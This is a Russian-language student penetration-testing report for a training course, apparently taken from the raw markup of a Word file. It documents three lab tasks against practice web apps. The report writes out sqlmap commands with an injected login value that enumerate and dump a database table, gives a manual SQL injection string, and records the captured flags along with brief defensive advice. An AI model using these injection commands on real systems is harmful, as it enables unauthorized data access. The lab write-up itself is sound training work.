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Отчет по пентесту-номер задания 17.x модуля 17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Персонализация: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Ермакова Наталья Олеговна (natalysoliton@mail.ru)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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="420" w:before="300" w:line="335.99999999999994" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_itq6qdceoc2u" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 17.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Протестируйте нашу новую систему регистрации по приглашениям на безопасность:</w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:5008/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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Общая информация:</w:t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Период тестирования: 17.12.2022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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:5008/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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Описание действий: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Пробовала использовать SQLmap, Burp Suite, а также SQL выражение в поле ввода, но результата не было. Посмотрела переписку коллег в Slack на эту тему и нашла, что флаг находится в самой платформе. Решила посмотреть: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2225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То есть флаг: flag{Bl1nd_NiNZZ@_P0wer}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Вопросы для самопроверки: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использовала ручное исследование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совет по защите кода от уязвимости: нетривиально спрятан флаг, но лучше секретную информацию не зашивать в страницу, т.к. это легко проверить.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yязвимость высокой опасности 9.0.10.0 по шкале.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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="420" w:before="300" w:line="335.99999999999994" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j9exldgh0lq5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 17.6.2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color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">На тестовой версии нашего сайта отображается информация об ошибках. Скажите своё о безопасности аутентификации нового портала, как специалиста по ИБ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="00a928"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:5009</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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Общая информация: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Период тестирования: 17.12.2022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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="00a928"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:5009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Описание действий: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Зашла на веб-страницу. Через терминал ввела </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://51.250.73.193:5009" --data="login=-1234' OR 1455=1455" --method POST --dbs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Вижу какие базы есть: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8895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Посмотрю что находится в базе ctf. Пишу в терминале запрос: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://51.250.73.193:5009" --data="login=-1234' OR 1455=1455" --method POST --tables -D ctf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610100" cy="78105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sqlmap -u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"http://51.250.73.193:5009" --data="login=-1234' OR 1455=1455"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--method POST --tables --columns -D ctf -T flag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1657350" cy="100012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sqlmap -u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"http://51.250.73.193:5009" --data="login=-1234' OR 1455=1455"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--method POST --dump -D ctf -T flag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905000" cy="98107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Флаг: flag{d0nt_sh0w_y0ur_3rr0r5}.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Вопросы для самопроверки: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befor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использовала SQLMap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совет по защите кода от уязвимости Error Based: ограничьте права пользователя базы данных;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позаботиться об отделении базы данных от логики веб-приложения и экранировать внешние запросы.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Уязвимость высокой опасности 9.0.10.0 по шкале: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color w:val="31313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5019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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="420" w:before="300" w:line="335.99999999999994" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3q2nnrpkr0w2" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 17.6.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="420" w:before="300" w:line="335.99999999999994" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Мы разработали новый продающий портал. Проверьте, пожалуйста, его безопасность: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="00a928"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:5007/shop/login/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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Общая информация: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Период тестирования: 17.12.2022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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="00a928"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:5007/shop/login/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Описание действий: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Перешла на веб-страницу и вижу подсказку по кредам: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029075" cy="404812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Ввожу в поле логин и поле пароль user.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Попадаю в интерне-магазин. Поисследую области на предмет поля ввода.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0701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Нашла поле ввода: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7178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поле ввожу " or 1=1 –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 проверяю что изменилось. Появилась новая картинка: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552700" cy="398145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Нажала на дискрипшен на картинке, получила флаг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3"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag{5ql_1nject10n_15_t00_51mpl3_f0r_y0u}.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41529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Вопросы для самопроверки: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befor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использовала ручное исследование веб-страницы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совет по защите кода от уязвимости SQL-инъекции: тщательно проверять форму ввода; ограничьте права пользователя базы данных; позаботиться об отделении базы данных от логики веб-приложения и экранировать внешние запросы.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Уязвимость высокой опасности 9.0.10.0 по шкале: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5019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rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman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2.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5009/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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51.250.73.193:5009/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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5007/shop/login/" TargetMode="External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hyperlink" Target="http://51.250.73.193:5008/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5007/shop/login/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5008/" TargetMode="External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